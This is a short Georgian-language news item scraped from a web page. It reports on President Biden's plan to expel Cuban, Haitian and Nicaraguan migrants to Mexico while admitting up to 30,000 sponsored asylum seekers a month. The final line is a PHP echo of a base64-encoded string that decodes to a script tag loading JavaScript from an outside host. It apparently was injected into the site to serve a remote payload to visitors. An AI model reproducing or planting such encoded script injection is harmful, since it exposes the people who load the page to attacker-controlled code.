celsiusi
ავერსი საქკაბელი
აშშ-ის პრეზიდენტმა, ჯო ბაიდენმა მექსიკის საზღვარზე შექმნილი მიგრაციული კრიზისის განსამუხტად და საზღვრის უსაფრთხოების დასაცავად ახალი გეგმა წარადგინა.
როგორც ბაიდენმა განაცხადა, აშშ-ის ხელისუფლება პრეზიდენტ ტრამპის მიერ 2020 წელს დაწესებულ შეზღუდვებს კუბელი, ჰაიტელი და ნიკარაგუელი არალეგალი მიგრანტების მექსიკაში დაუყოვნებლივი გაძევებისთვის გამოიყენებს.
ამავე დროს, აშშ მზადაა, ყოველთვე ამავე ქვეყნებიდან აშშ-ში თვითმფრინავით ჩასული 30 000 თავშესაფრის მაძიებელი ლეგალურად მიიღოს. ამისთვის მათ უნდა ჰყავდეთ ფინანსური მხარდამჭერი აშშ-ში და უნდა გაიარონ უსაფრთხოების სამსახურების შემოწმება.
„ეს პროცესი იქნება წესების დაცვით, უსაფრთხო და ჰუმანური”, – განაცხადა ბაიდენმა. მისივე თქმით, ეს გეგმა საგრძნობლად შეამცირებს იმ ადამიანების რიცხვს, რომლებიც აშშ-ის საზღვრის კვეთას არალეგალურად ცდილობენ.
ოფიციალური მონაცემებით, მხოლოდ ნოემბერში აშშ-ისა და მექსიკის საზღვარზე 82 000 ჰაიტელი, ნიკარაგუელი და კუბელი მიგრანტი დააკავეს, რომლებიც შტატებში ჩასვლას უკანონოდ შეეცადნენ.
489
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");